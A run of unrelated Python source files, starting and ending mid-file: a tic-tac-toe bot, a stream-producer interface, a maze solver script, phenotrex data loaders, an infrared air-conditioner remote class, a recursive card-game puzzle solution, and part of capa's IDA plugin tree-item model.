(24,24), 1: (114,24), 2: (204,24), 3: (24,114), 4: (114,114), 5: (204,114), 6: (24,204), 7: (114,204), 8: (204,204) } li = PIL.Image.open(f"assets/tictactoe/{self.turn}.png") self.image.paste(li, poses[field]) li.close() # Ha nyert, helyezze le a vonalat hogy hol if f != False: c = PIL.Image.open(f"assets/tictactoe/{f}.png") if f in ("v","h"): self.image.paste(c,p) else: self.image.paste(c,p,c) c.close() # Mentse a képet self.image.save(self.file) # Forduljon a menet self.turn = "x" if self.turn == "o" else "o" if f != False: raise Winner elif self.is_board_full(): raise Tie else: raise InvalidMove def get_board_copy(self): fields=[] for field in self.fields: fields.append(field) return fields def get_move_from_list(self, moves): fields=[] for i in moves: if self.is_field_free(i): fields.append(i) return random.choice(fields) if len(fields) != 0 else None def get_computer_move(self, stoopid_mode=True): if stoopid_mode: fields = [f for f in range(0,9) if self.is_field_free(f)] return random.choice(fields) else: # Megnézzük azt ki áll nyerésre most... bl, pl = ("x","o") if self.players["x"].bot else ("o","x") for field in range(0,9): board = self.get_board_copy() if board[field] == "": # Derítsük ki hogy a bot nyerésre áll-e, ha igen tegyen board[field] = bl i,p = self.is_winner(board,bl) if i != False: return field # Ha viszont játékos áll nyerésre, csapjon le rá board[field] = pl i,p = self.is_winner(board,pl) if i != False: return field # Foglaljon helyet valamely szélére field = self.get_move_from_list([0,2,6,8]) if field != None: return field # Foglalja le a középső mezőt, ha szabad if self.is_field_free(4): return 4 # Ha továbbra sincs hely, mozogjon keresztben return self.get_move_from_list([1,3,5,7]) def is_winner(self, f, l): if (f[0] == l and f[1] == l and f[2] == l): return "h", (20,57) elif (f[3] == l and f[4] == l and f[5] == l): return "h", (20,147) elif (f[6] == l and f[7] == l and f[8] == l): return "h", (20,237) elif (f[0] == l and f[3] == l and f[6] == l): return "v", (57,20) elif (f[1] == l and f[4] == l and f[7] == l): return "v", (147,20) elif (f[2] == l and f[5] == l and f[8] == l): return "v", (237,20) elif (f[0] == l and f[4] == l and f[8] == l): return "l", (0,0) elif (f[2] == l and f[4] == l and f[6] == l): return "r", (0,0) else: return False, False
"""Provide definition of abstract Stream Producer This file can be imported as a module and contains the following classes: * StreamProducer - Abstract class that must be implement by concrete Stream Producers """ import abc import logging import types import typing class StreamProducer(abc.ABC): """Abstract class that must be implement by concrete Stream Producers""" def __init__(self, **kwargs): """Initializes the logger to be used Parameters ---------- kwargs : dict logger_name : str Logger's name. """ logger_name = kwargs.get("logger_name", __name__) self._logger = logging.getLogger(logger_name) self._logger.debug("StreamProducer.__init__(logger_name=%s)", logger_name) def __enter__(self): self._logger.debug("StreamProducer.__enter__()") self.connect() def __exit__( self, exc_type: typing.Optional[typing.Type[BaseException]], exc_val: typing.Optional[BaseException], exc_tb: typing.Optional[types.TracebackType], ): self._logger.debug("StreamProducer.__exit__()") self.disconnect() @abc.abstractmethod def connect(self): """Establish the required connections with the Stream Server.""" @abc.abstractmethod def disconnect(self): """Closes all connections with the Stream Server""" @abc.abstractmethod def persist_data(self, data: typing.Dict[str, typing.Union[str, int]]): """Persist a dict with the website metrics in the corresponding Stream Server. data : typing.Dict[str, typing.Union[str, int]] Website metrics """
# coding: utf-8 import sys import os import re import argparse from lib import meiro # by https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse def str2bool(v): if v.lower() in ('yes', 'true', 't', 'y', '1'): return True elif v.lower() in ('no', 'false', 'f', 'n', '0'): return False else: raise argparse.ArgumentTypeError('Boolean value expected.') parser = argparse.ArgumentParser(description = "-c/-colortype [0-2] : gradation color type, -d/-drawanswer [True|False] : whether draw answer line; arguments are optional") parser.add_argument("-c", type=int, help = "-c/-colortype [0-2] : gradation color type [0-3]", required=False) parser.add_argument("-colortype", type=int, help = "-c/-colortype [0-2] : gradation color type [0-3]", required=False) parser.add_argument("-d", type=str2bool, help = "-d/-drawanswer [True|False] : whether draw answer line [True|False]", required=False) parser.add_argument("-drawanswer", type=str2bool, help = "-d/-drawanswer [True|False] : whether draw answer line [True|False]", required=False) command_arguments = parser.parse_args() colortype = 0 draw = True if command_arguments.c: colortype = command_arguments.c if command_arguments.colortype: colortype = command_arguments.colortype if not command_arguments.d == None: draw = command_arguments.d if not command_arguments.drawanswer == None: draw = command_arguments.drawanswer sys.setrecursionlimit(100000) directory = os.path.dirname('output/') if not os.path.exists(directory): print('[error] there isn\'t \"output\" directory') quit() directory2 = os.path.dirname('output/solution/') if not os.path.exists(directory2): os.makedirs(directory2) files = os.listdir(directory) c = 0 for f in files: m = re.match(r'meiro_(.+)', f) if m: solutionpath = directory2+'/solutionmap_'+m.group(1) depthpath = directory2+'/depthmap_'+m.group(1) if (not os.path.exists(solutionpath)) or (not os.path.exists(depthpath)): solve1 = meiro.SolveMeiro(os.path.abspath(directory+'/'+f)) if not os.path.exists(solutionpath): solve1.createSolutionMap(os.path.abspath(solutionpath)) c += 1 if not os.path.exists(depthpath): solve1.createDepthMap(os.path.abspath(depthpath), colortype, draw) c += 1 if c == 0: print('[info] No solution map or depth map is generated.')
# # Created by Lukas Lüftinger on 2/5/19. # from typing import List, Dict, Tuple, Optional from collections import Counter import json import gzip import pandas as pd from Bio import SeqIO from Bio.Alphabet import IUPAC, HasStopCodon, _verify_alphabet import numpy as np from phenotrex.util.logging import get_logger from phenotrex.structure.records import GenotypeRecord, PhenotypeRecord, GroupRecord, TrainingRecord DEFAULT_TRAIT_SIGN_MAPPING = {"YES": 1, "NO": 0} def _is_gzipped(f: str) -> bool: try: with gzip.open(f) as handle: handle.read(1) return True except OSError: return False def load_fasta_file(input_file: str) -> Tuple[str, List]: """ Load a fasta file into a list of SeqRecords. :param input_file: The path to the input fasta file. :returns: A tuple of the sequence type ('protein' or 'dna'), and the list of SeqRecords. """ if _is_gzipped(input_file): openfunc = gzip.open bit = 'rt' else: openfunc = open bit = 'r' with openfunc(input_file, bit) as handle: seqs = [x.upper() for x in SeqIO.parse(handle=handle, format='fasta', alphabet=IUPAC.ambiguous_dna)] if not all(_verify_alphabet(x.seq) for x in seqs): handle.seek(0) seqs = [x.upper() for x in SeqIO.parse(handle=handle, format='fasta', alphabet=HasStopCodon(IUPAC.extended_protein))] if not all(_verify_alphabet(x.seq) for x in seqs): raise ValueError('Invalid input file (neither DNA nor protein FASTA).') return 'protein', seqs return 'dna', seqs def load_genotype_file(input_file: str) -> List[GenotypeRecord]: """ Loads a genotype .tsv file and returns a list of GenotypeRecord for each entry. :param input_file: The path to the input genotype file. :return: List[GenotypeRecord] of records in the genotype file """ with open(input_file) as genotype_file: metadata = dict() genotype_lines = [] genotype_records = [] for line in genotype_file: if line.strip().startswith('#'): k, v = line[1:].strip().split(':', maxsplit=1) metadata[k] = v else: genotype_lines.append(line) metadata = {**{'feature_type': 'legacy'}, **metadata} for line in genotype_lines: identifier, *features = line.strip().split("\t") genotype_records.append( GenotypeRecord( identifier=identifier, feature_type=metadata['feature_type'], features=features )) dupcount = Counter([x.identifier for x in genotype_records]) if dupcount.most_common()[0][1] > 1: raise RuntimeError(f"Duplicate entries found in genotype file: {dupcount}") return sorted(genotype_records, key=lambda x: x.identifier) def load_phenotype_file( input_file: str, sign_mapping: Dict[str, int] = None ) -> List[PhenotypeRecord]: """ Loads a phenotype .tsv file and returns a list of PhenotypeRecord for each entry. :param input_file: The path to the input phenotype file. :param sign_mapping: an optional Dict to change mappings of trait sign. Default: {"YES": 1, "NO": 0} :return: List[PhenotypeRecord] of records in the phenotype file """ with open(input_file) as phenotype_file: identifiers = [] trait_signs = [] _, trait_name = phenotype_file.readline().strip().split("\t") for line in phenotype_file: identifier, trait_sign = line.strip().split("\t") identifiers.append(identifier) trait_signs.append(trait_sign) dupcount = Counter(identifiers) if dupcount.most_common()[0][1] > 1: raise RuntimeError(f"Duplicate entries found in genotype file: {dupcount}") if sign_mapping is None: sign_mapping = DEFAULT_TRAIT_SIGN_MAPPING trait_signs = [sign_mapping.get(x, None) for x in trait_signs] phenotype_records = [PhenotypeRecord(identifier=x, trait_name=trait_name, trait_sign=y) for x, y in zip(identifiers, trait_signs)] ret = sorted(phenotype_records, key=lambda x: x.identifier) return ret def load_groups_file(input_file: str, selected_rank: str = None) -> List[GroupRecord]: """ Loads a .tsv file which contains group or taxid for each sample in the other training files. Group-Ids may be ncbi-taxon-ids or arbitrary group names. Taxon-Ids are only used if a standard rank is selected, otherwise user-specified group-ids are assumed. Automatically classifies the [TODO missing text?] :param input_file: path to the file that is processed :param selected_rank: the standard rank that is selected (optional) if not set, the input file is assumed to contain groups, i.e., each unique entry of the ID will be a new group :return: a list of GroupRecords """ with open(input_file) as groups_file: identifiers = [] group_ids = [] for line in groups_file: identifier, group_id = line.strip().split("\t") identifiers.append(identifier) group_ids.append(group_id) dupcount = Counter(identifiers) if dupcount.most_common()[0][1] > 1: raise RuntimeError(f"Duplicate entries found in groups file: {dupcount}") if selected_rank: try: from phenotrex.util.taxonomy import get_taxonomic_group_mapping group_name_mapping, group_id_mapping = get_taxonomic_group_mapping( group_ids=group_ids, selected_rank=selected_rank ) group_records = [GroupRecord(identifier=x, group_id=group_id_mapping[y], group_name=group_name_mapping[y]) for x, y in zip(identifiers, group_ids)] except ImportError: raise RuntimeError( "A required package was not found. ete3 is required to support taxonomic ids for" " grouping. Please install or divide your samples into groups manually") else: group_id_mapping = {x: group_id for group_id, x in enumerate(set(group_ids))} group_records = [GroupRecord(identifier=x, group_id=group_id_mapping[y], group_name=y) for x, y in zip(identifiers, group_ids)] ret = sorted(group_records, key=lambda x: x.identifier) return ret def load_params_file(params_file: str) -> Dict: """ Load a JSON file of training parameters. :param params_file: The input file. :return: A dictionary of training parameters. """ with open(params_file, 'r') as fin: return json.load(fin) def write_genotype_file(genotypes: List[GenotypeRecord], output_file: str): """ Saves a list of GenotypeRecords to a .genotype file. :param genotypes: The genotypes to write to a file. :param output_file: The output file path. """ feature_types = list(set(x.feature_type for x in genotypes)) if len(feature_types) > 1: raise ValueError( 'Cannot write GenotypeRecords with different feature_types to the same genotype file.' ) with open(output_file, 'w') as genotype_file: genotype_file.write(f'#feature_type:{feature_types[0]}\n') for g in genotypes: genotype_file.write('\t'.join([g.identifier, *g.features, '\n'])) def write_params_file(params_file: str, params: Dict): """ Write a JSON file of training parameters. :param params_file: The output file path. :param params: A dictionary of training parameters. :return: A dictionary of training parameters. """ class NumpyEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, np.integer): return int(obj) elif isinstance(obj, np.floating): return float(obj) elif isinstance(obj, np.ndarray): return obj.tolist() else: return super(NumpyEncoder, self).default(obj) with open(params_file, 'w') as fout: json.dump(params, fp=fout, indent=2, cls=NumpyEncoder) fout.write('\n') def collate_training_data( genotype_records: List[GenotypeRecord], phenotype_records: List[PhenotypeRecord], group_records: List[GroupRecord], verb: bool = False ) -> List[TrainingRecord]: """ Returns a list of TrainingRecord from two lists of GenotypeRecord and PhenotypeRecord. To be used for training and CV of TrexClassifier. Checks if 1:1 mapping of phenotypes and genotypes exists, and if all PhenotypeRecords pertain to same trait. :param genotype_records: List[GenotypeRecord] :param phenotype_records: List[PhenotypeRecord] :param group_records: List[GroupRecord] optional, if leave one group out is the split strategy :param verb: toggle verbosity. :return: A list of TrainingRecords. """ logger = get_logger(__name__, verb=verb) gr_dict = {x.identifier: x for x in genotype_records} pr_dict = {x.identifier: x for x in phenotype_records} gp_dict = {x.identifier: x for x in group_records} traits = set(x.trait_name for x in phenotype_records) if not set(gr_dict.keys()).issuperset(set(pr_dict.keys())): raise RuntimeError( "Not all identifiers of phenotype records were found in the phenotype file. " "Cannot collate to TrainingRecords." ) if not set(gp_dict.keys()).issuperset(set(pr_dict.keys())): raise RuntimeError( "Not all identifiers of phenotype records were found in the groups file. " "Cannot collate to TrainingRecords." ) if len(traits) > 1: raise RuntimeError( "More than one trait has been found in phenotype records. " "Cannot collate to TrainingRecords." ) ret = [ TrainingRecord( identifier=pr_dict[x].identifier, trait_name=pr_dict[x].trait_name, trait_sign=pr_dict[x].trait_sign, feature_type=gr_dict[x].feature_type, features=gr_dict[x].features, group_name=gp_dict[x].group_name, group_id=gp_dict[x].group_id ) for x in pr_dict.keys() ] logger.info(f"Collated genotype and phenotype records into {len(ret)} TrainingRecord.") return ret def load_training_files( genotype_file: str, phenotype_file: str, groups_file: str = None, selected_rank: str = None, verb=False ) -> Tuple[ List[TrainingRecord], List[GenotypeRecord], List[PhenotypeRecord], List[GroupRecord] ]: """ Convenience function to load phenotype, genotype and optionally groups file together, and return a list of TrainingRecord. :param genotype_file: The path to the input genotype file. :param phenotype_file: The path to the input phenotype file. :param groups_file: The path to the input groups file. Optional. :param selected_rank: The selected standard rank to use for taxonomic grouping :param verb: toggle verbosity. :return: The collated TrainingRecords as well as single genotype, phenotype and group records """ logger = get_logger(__name__, verb=verb) gr = load_genotype_file(genotype_file) pr = load_phenotype_file(phenotype_file) if groups_file: gp = load_groups_file(groups_file, selected_rank=selected_rank) else: # if not given, each sample gets its own group (not used currently) gp = [ GroupRecord(identifier=x.identifier, group_name=x.identifier, group_id=y) for y, x in enumerate(pr) ] tr = collate_training_data(gr, pr, gp, verb=verb) logger.info("Records successfully loaded from file.") return tr, gr, pr, gp def write_weights_file(weights_file: str, weights: Dict, annots: List[Optional[str]] = None): """ Function to write the weights to specified file in tab-separated fashion with header :param weights_file: The path to the file to which the output will be written :param weights: sorted dictionary storing weights with feature names as indices :param annots: annotations for the features names. Optional. :return: nothing """ names, weight_vals = zip(*list(weights.items())) out = pd.DataFrame({'Feature Name': names, 'Weight': weight_vals}) if annots is not None: out['Feature Annotation'] = annots out.index.name = 'Rank' out = out.reset_index(drop=False) out['Rank'] += 1 out.to_csv(weights_file, sep='\t', index=False) def write_cccv_accuracy_file(output_file: str, cccv_results): """ Function to write the cccv accuracies in the exact format that phendb uses as input. :param output_file: file :param cccv_results: :return: """ write_list = [] for completeness, data in cccv_results.items(): for contamination, nested_data in data.items(): write_item = { "mean_balanced_accuracy" : nested_data["score_mean"], "stddev_balanced_accuracy": nested_data["score_sd"], "contamination" : contamination, "completeness" : completeness } write_list.append(write_item) with open(output_file, "w") as outf_handler: json.dump(write_list, outf_handler, indent="\t") outf_handler.write('\n') def load_cccv_accuracy_file(cccv_file: str) -> Dict: """ Function to load cccv accuracies from phendb format. :param cccv_file: The CCCV results file. :return: A Dict of CCCV results in the internal CCCV results format. """ cccv_results = {} with open(cccv_file) as fin: loaded = json.load(fin) for row in loaded: score_mean, score_sd, conta, comple = row.values() comple_dict = cccv_results.setdefault(comple, {}) comple_dict[conta] = { 'score_mean': score_mean, 'score_sd': score_sd } return cccv_results def write_misclassifications_file( output_file: str, records: List[TrainingRecord], misclassifications, use_groups: bool = False ): """ Function to write the misclassifications file. :param output_file: name of the outputfile :param records: List of trainingRecord objects :param misclassifications: List of percentages of misclassifications :param use_groups: toggles average over groups and groups output :return: """ identifier_list = [record.identifier for record in records] trait_sign_list = [record.trait_sign for record in records] if use_groups: group_names = [record.group_name for record in records] identifier_list = list(set(group_names)) grouped_mcs = [] grouped_signs = [] for group in identifier_list: group_mcs = [mcs for mcs, group_name in zip(misclassifications, group_names) if group == group_name] group_sign = [trait_sign for trait_sign, group_name in zip(trait_sign_list, group_names) if group == group_name] grouped_mcs.append(np.mean(group_mcs)) grouped_signs.append(np.mean(group_sign)) trait_sign_list = grouped_signs misclassifications = grouped_mcs sorted_tuples = sorted(zip(identifier_list, trait_sign_list, misclassifications), key=lambda k: k[2], reverse=True) header = ["Identifier", "Trait present", "Mis-classifications [frac.]"] trait_translation = {y: x for x, y in DEFAULT_TRAIT_SIGN_MAPPING.items()} with open(output_file, "w") as outf: outf.write("%s\n" % "\t".join(header)) for identifier, trait_sign, mcs in sorted_tuples: outf.write(f'{identifier}\t{trait_translation.get(trait_sign, "MIXED")}\t{mcs}\n')
# Based on Vestel YKR-H/002E AC remote from time import sleep from acremote.thermo import W1Thermo import gpirblast class VestelACRemote(): def __init__(self, gpio_pin: int): self._SWING = True self._ON = False self._HEALTH = False self._STRONG = False self._SLEEP = False self._TIMER = 0.0 self._SCREEN = True self._CLEAN = False self._FRESH = False self._FEELING = False self._TEMP = 27 self._MIN_TEMP = 16 self._MAX_TEMP = 36 self._MODES = { 'AUTO': 0, 'COOL': 32, 'DRY': 64, 'HEAT': 128, 'FAN': 192, } self._MODE = 'COOL' self._SPEEDS = { 'AUTO': 160, 'LOW': 96, 'MID': 64, 'HIGH': 32, } self._SPEED = 'HIGH' self._GPIO_PIN = gpio_pin self._THERMO = W1Thermo() self._DATA_FIELDS = [ 195, # 00 Device ID 0 0, # 01 Temperature value from 64 to 192 (step=8) +7 if SWING=off 224, # 02 Device ID 1 0, # 03 Unknown value 0, # 04 SPEED + TIMER integral part (in hours) 0, # 05 TIMER fractional part (30 in minutes) + STRONG switch (+/-64) 0, # 06 MODE, FRESH (+/-16), FEELING switch (+/-8), SLEEP (+/-4) 0, # 07 FEELING value +74 +ROOM_TEMP in Celsius (AC Remote value) 0, # 08 Unknown value 0, # 09 ON/OFF (0/32), health (+/-2 works only when on), TIMER on +64 0, # 10 Unknown value 0, # 11 Button ID ] ################################################# # PROPERTIES ################################################# @property def swing(self) -> bool: return self._SWING @swing.setter def swing(self, value: bool): if isinstance(value, bool): self._SWING = value else: raise ValueError('Swing value must be a boolean') @property def on(self) -> bool: return self._ON @on.setter def on(self, value: bool): if isinstance(value, bool): self._ON = value else: raise ValueError('On value must be a boolean') @property def health(self) -> bool: return self._HEALTH @health.setter def health(self, value: bool): if isinstance(value, bool): self._HEALTH = value else: raise ValueError('Health value must be a boolean') @property def strong(self) -> bool: return self._STRONG @strong.setter def strong(self, value: bool): if isinstance(value, bool): self._STRONG = value else: raise ValueError('Strong value must be a boolean') @property def sleep(self) -> bool: return self._SLEEP @sleep.setter def sleep(self, value: bool): if isinstance(value, bool): self._SLEEP = value else: raise ValueError('Sleep value must be a boolean') @property def screen(self) -> bool: return self._SCREEN @screen.setter def screen(self, value: bool): if isinstance(value, bool): self._SCREEN = value else: raise ValueError('Screen value must be a boolean') @property def clean(self) -> bool: return self._CLEAN @clean.setter def clean(self, value: bool): if isinstance(value, bool): self._CLEAN = value else: raise ValueError('Clean value must be a boolean') @property def fresh(self) -> bool: return self._FRESH @fresh.setter def fresh(self, value: bool): if isinstance(value, bool): self._FRESH = value else: raise ValueError('Fresh value must be a boolean') @property def feeling(self) -> bool: return self._FEELING @feeling.setter def feeling(self, value: bool): if isinstance(value, bool): self._FEELING = value else: raise ValueError('Feeling value must be a boolean') @property def temp(self) -> int: return self._TEMP @temp.setter def temp(self, value: int): if value in range(self._MIN_TEMP, self._MAX_TEMP + 1): self._TEMP = int(value) else: raise ValueError( 'Temperature value must be within {} and {}'.format( self._MIN_TEMP, self._MAX_TEMP ) ) @property def min_temp(self): return self._MIN_TEMP @property def max_temp(self): return self._MAX_TEMP @property def mode(self): return self._MODE @mode.setter def mode(self, value: str): if value in self._MODES: self._MODE = value else: raise ValueError('Mode value must be in {}'.format(self._MODES)) @property def speed(self) -> str: return self._SPEED @speed.setter def speed(self, value: str): if value in self._SPEEDS: self._SPEED = value else: raise ValueError('Speed value must be in {}'.format(self._SPEEDS)) @property def timer(self) -> float: return self._TIMER @timer.setter def timer(self, value: float): error = 'Timer value must be within 0 and 24' try: value = float(value) except ValueError: raise ValueError(error) if 0.0 <= value <= 24.0: if value % 0.5 == 0.0: self._TIMER = value else: self._TIMER = float(int(value)) # cut out the fractional part else: self._TIMER = 0.0 raise ValueError(error) # Dynamic property def timer_step(self, timer: float) -> float: if not timer: timer = self._TIMER step = 0.5 if 10.0 <= timer < 24.0: step = 1.0 return step ################################################# # STATIC METHODS ################################################# @staticmethod def form_octet(value: int): string = bin(value)[2:] # remove '0b' length = len(string) if length < 8: string = '0' * (8 - length) + string if length > 8: string = string[-8:] # overflow return string ################################################# # INTERNAL METHODS ################################################# def _set_on_off(self): if self._ON: self._CLEAN = False self._DATA_FIELDS[9] = 32 if self._HEALTH: self._DATA_FIELDS[9] += 2 if self._TIMER != 0.0: self._DATA_FIELDS[9] += 64 else: if self._CLEAN: self._DATA_FIELDS[9] = 4 else: self._DATA_FIELDS[9] = 0 def _set_mode_fresh_feeling_sleep(self): self._DATA_FIELDS[6] = self._MODES[self._MODE] if self._FRESH: self._DATA_FIELDS[6] += 16 if self._FEELING: self._DATA_FIELDS[6] += 8 self._DATA_FIELDS[6] = 74 + int(list(self._THERMO.poll().values())[0]) else: self._DATA_FIELDS[7] = 0 if self._SLEEP: self._DATA_FIELDS[6] += 4 def _set_temp_and_swing(self): if self._MODE in ('AUTO', 'FAN'): self._DATA_FIELDS[1] = 0 else: self._DATA_FIELDS[1] = 64 + ((self._TEMP - self._MIN_TEMP) * 8) if not self._SWING: self._DATA_FIELDS[1] += 7 def _set_speed_and_timer_int(self): if self._MODE == 'AUTO': self._SPEED = self._MODE self._DATA_FIELDS[4] = self._SPEEDS[self._SPEED] self._DATA_FIELDS[4] += int(self._TIMER) # timer hours def _set_strong_and_timer_frac(self): if self._STRONG: self._DATA_FIELDS[5] = 64 else: self._DATA_FIELDS[5] = 0 if self._TIMER % 1 == 0.5: self._DATA_FIELDS[5] += 30 # timer minutes def _form_bin_str(self): bin_str = '' chk_sum = 0 for value in self._DATA_FIELDS: chk_sum += value bin_str += self.form_octet(value)[::-1] # reverse octet to form a proper signal # print(self.form_octet(value)[::-1], value) # print(self.form_octet(chk_sum)[::-1], int(self.form_octet(chk_sum)[::-1], 2)) bin_str += self.form_octet(chk_sum)[::-1] return bin_str def _refresh_data_fields(self): self._set_on_off() self._set_mode_fresh_feeling_sleep() self._set_temp_and_swing() self._set_speed_and_timer_int() self._set_strong_and_timer_frac() def _send_code(self): self._refresh_data_fields() gpirblast.send_code(self._GPIO_PIN, self._form_bin_str()) ################################################# # BUTTONS ################################################# def btn_on(self): # Virtual button self._ON = False self.btn_on_off() def btn_off(self): # Virtual button self._ON = True self.btn_on_off() def btn_tmp_set(self, value: int) -> bool: # Virtual button self._DATA_FIELDS[9] = 32 self._DATA_FIELDS[11] = 5 self._ON = True # act_allow = value in range(self._MIN_TEMP, self._MAX_TEMP + 1) # if act_allow: # self._TEMP = value try: self.temp = int(value) except ValueError: raise ValueError('Temperature value must be within 16 and 32') self._send_code() # return act_allow def btn_fungusproof(self): # Button ID = NONE if not self._ON: self._ON = True # Force turn off self.btn_on_off() sleep(1) self._ON = True self.btn_on_off() sleep(1) self._ON = True self.btn_on_off() def btn_tmp_up(self) -> bool: # Button ID = 0 act_allow = self._TEMP < self._MAX_TEMP if act_allow: self._TEMP += 1 else: self._TEMP = self._MAX_TEMP if self._ON: self._DATA_FIELDS[11] = 0 self._send_code() return act_allow def btn_tmp_down(self) -> bool: # Button ID = 1 act_allow = self._TEMP > self._MIN_TEMP if act_allow: self._TEMP -= 1 else: self._TEMP = self._MIN_TEMP if self._ON: self._DATA_FIELDS[11] = 1 self._send_code() return act_allow def btn_swing(self): # Button ID = 2 if self._ON: self._DATA_FIELDS[11] = 2 self._SWING = not self._SWING self._send_code() def btn_speed(self, value: str): # Button ID = 4 if self._ON: self._DATA_FIELDS[11] = 4 self.speed = value.upper() self._send_code() def btn_on_off(self): # Button ID = 5 self._DATA_FIELDS[11] = 5 self._ON = not self._ON self._send_code() def btn_mode(self, value: str): # Button ID = 6 if self._ON: self._DATA_FIELDS[11] = 6 self.mode = value.upper() self._send_code() def btn_health(self): # Button ID = 7 if self._ON: self._DATA_FIELDS[11] = 7 self._HEALTH = not self._HEALTH self._send_code() def btn_strong(self): # Button ID = 8 if self._ON: self._DATA_FIELDS[11] = 8 self._STRONG = not self._STRONG self._send_code() def btn_sleep(self): # Button ID = 11 if self._ON: self._DATA_FIELDS[11] = 11 self._SLEEP = not self._SLEEP self._send_code() def btn_timer(self, value=0.0): # Button ID = 13 if self._ON: self._DATA_FIELDS[11] = 13 self.timer = value self._send_code() def btn_screen(self): # Button ID = 21 if self._ON: self._DATA_FIELDS[11] = 21 self._SCREEN = not self._SCREEN self._send_code() def btn_clean(self): # Button ID = 25 if self._ON: return False else: self._DATA_FIELDS[11] = 25 self._CLEAN = not self._CLEAN self._send_code() return True def btn_fresh(self): # Button ID = 29 if self._ON: self._DATA_FIELDS[11] = 29 self._FRESH = not self._FRESH self._send_code() def btn_feeling(self): # Button ID = 30 if self._ON: self._DATA_FIELDS[11] = 30 self._FEELING = not self._FEELING self._send_code() if __name__ == '__main__': a = VestelACRemote() a.btn_on_off()
from copy import deepcopy d1 = [] d2 = [] player_2 = False with open('in', 'r') as f: f.readline() for line in f.readlines(): try: i = int(line.strip()) if player_2: d2.append(i) else: d1.append(i) except Exception: player_2 = True seen = set() next_game_id = 1 last_deck_1 = None last_deck_2 = None def game(deck1, deck2, game_id=0): global next_game_id, last_deck_1, last_deck_2 while len(deck1) > 0 and len(deck2) > 0: h = (str(game_id), str(deck1), str(deck2)) if h in seen: return 1 seen.add(h) card1, deck1 = deck1[0], deck1[1:] card2, deck2 = deck2[0], deck2[1:] if len(deck1) >= card1 and len(deck2) >= card2: next_game_id += 1 player_1_wins = game(deepcopy(deck1[:card1]), deepcopy(deck2[:card2]), game_id=next_game_id - 1) == 1 else: player_1_wins = card1 > card2 if player_1_wins: deck1 = deepcopy(deck1) + [card1, card2] else: deck2 = deepcopy(deck2) + [card2, card1] last_deck_1 = deck1 last_deck_2 = deck2 return 1 if len(deck2) == 0 else 2 game(deepcopy(d1), deepcopy(d2)) res = 0 d = last_deck_1 if len(last_deck_2) == 0 else last_deck_2 d = list(reversed(d)) for i in range(1, len(d) + 1): res += i * d[i - 1] print(res)
from dae.utils.variant_utils import mat2str def test_dae_transmitted_loader_simple(dae_transmitted): for fv in dae_transmitted.family_variants_iterator(): print(fv, mat2str(fv.best_state), mat2str(fv.gt))
# Copyright (C) 2020 FireEye, Inc. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: [package root]/LICENSE.txt # Unless required by applicable law or agreed to in writing, software distributed under the License # is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and limitations under the License. import sys import codecs import idc import idaapi from PyQt5 import QtCore import capa.ida.helpers def info_to_name(display): """extract root value from display name e.g. function(my_function) => my_function """ try: return display.split("(")[1].rstrip(")") except IndexError: return "" def location_to_hex(location): """convert location to hex for display""" return "%08X" % location class CapaExplorerDataItem(object): """store data for CapaExplorerDataModel""" def __init__(self, parent, data, can_check=True): """initialize item""" self.pred = parent self._data = data self.children = [] self._checked = False self._can_check = can_check # default state for item self.flags = QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable if self._can_check: self.flags = self.flags | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsTristate if self.pred: self.pred.appendChild(self) def setIsEditable(self, isEditable=False): """modify item editable flags @param isEditable: True, can edit, False cannot edit """ if isEditable: self.flags |= QtCore.Qt.ItemIsEditable else: self.flags &= ~QtCore.Qt.ItemIsEditable def setChecked(self, checked): """set item as checked @param checked: True, item checked, False item not checked """ self._checked = checked def canCheck(self): """ """ return self._can_check def isChecked(self): """get item is checked""" return self._checked def appendChild(self, item): """add a new child to specified item @param item: CapaExplorerDataItem """ self.children.append(item) def child(self, row): """get child row @param row: row number """ return self.children[row] def childCount(self): """get child count""" return len(self.children) def columnCount(self): """get column count""" return len(self._data) def data(self, column): """get data at column @param: column number """ try: return self._data[column] except IndexError: return None def parent(self): """get parent""" return self.pred def row(self): """get row location""" if self.pred: return self.pred.children.index(self) return 0 def setData(self, column, value): """set data in column @param column: column number @value: value to set (assume str) """ self._data[column] = value def children(self): """yield children""" for child in self.children: yield child def removeChildren(self): """remove children""" del self.children[:] def __str__(self): """get string representation of columns used for copy-n-paste operations """ return " ".join([data for data in self._data if data]) @property def info(self): """return data stored in information column""" return self._data[0] @property def location(self): """return data stored in location column""" try: # address stored as str, convert to int before return return int(self._data[1], 16) except ValueError: return None @property def details(self): """return data stored in details column""" return self._data[2] class CapaExplorerRuleItem(CapaExplorerDataItem): """store data for rule result""" fmt = "%s (%d matches)" def __init__(self, parent, name, namespace, count, source, can_check=True): """initialize item @param parent: parent node @param name: rule name @param namespace: rule namespace @param count: number of match for this rule @param source: rule source (tooltip) """ display = self.fmt % (name, count) if count > 1 else name super(CapaExplorerRuleItem, self).__init__(parent, [display, "", namespace], can_check) self._source = source @property def source(self): """return rule source to display (tooltip)""" return self._source class CapaExplorerRuleMatchItem(CapaExplorerDataItem): """store data for rule match""" def __init__(self, parent, display, source=""): """initialize item @param parent: parent node @param display: text to display in UI @param source: rule match source to display (tooltip) """ super(CapaExplorerRuleMatchItem, self).__init__(parent, [display, "", ""]) self._source = source @property def source(self): """ return rule contents for display """ return self._source class CapaExplorerFunctionItem(CapaExplorerDataItem): """store data for function match""" fmt = "function(%s)" def __init__(self, parent, location, can_check=True): """initialize item @param parent: parent node @param location: virtual address of function as seen by IDA """ super(CapaExplorerFunctionItem, self).__init__( parent, [self.fmt % idaapi.get_name(location), location_to_hex(location), ""], can_check ) @property def info(self): """return function name""" info = super(CapaExplorerFunctionItem, self).info display = info_to_name(info) return display if display else info @info.setter def info(self, display): """set function name called when user changes function name in plugin UI @param display: new function name to display """ self._data[0] = self.fmt % display class CapaExplorerSubscopeItem(CapaExplorerDataItem): """store data for subscope match""" fmt = "subscope(%s)" def __init__(self, parent, scope): """initialize item @param parent: parent node @param scope: subscope name """ super(CapaExplorerSubscopeItem, self).__init__(parent, [self.fmt % scope, "", ""]) class CapaExplorerBlockItem(CapaExplorerDataItem): """store data for basic block match""" fmt = "basic block(loc_%08X)" def __init__(self, parent, location): """initialize item @param 